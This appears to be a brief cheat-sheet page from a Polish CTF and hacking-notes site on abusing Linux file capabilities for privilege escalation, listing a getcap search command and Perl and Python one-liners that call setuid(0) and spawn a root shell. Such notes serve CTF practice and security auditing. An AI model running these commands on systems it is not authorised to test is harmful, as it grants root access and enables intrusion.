>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / Linux Capabilities Abuse

Linux Capabilities Abuse

Privilege Escalation Linux Privesc linux

Find capabilities

getcap -r / 2>/dev/null

Perl with cap_setuid+ep

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Python with cap_setuid+ep

python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Reference

https://www.insecure.ws/linux/getcap_setcap.html#getcap-setcap-and-file-capabilities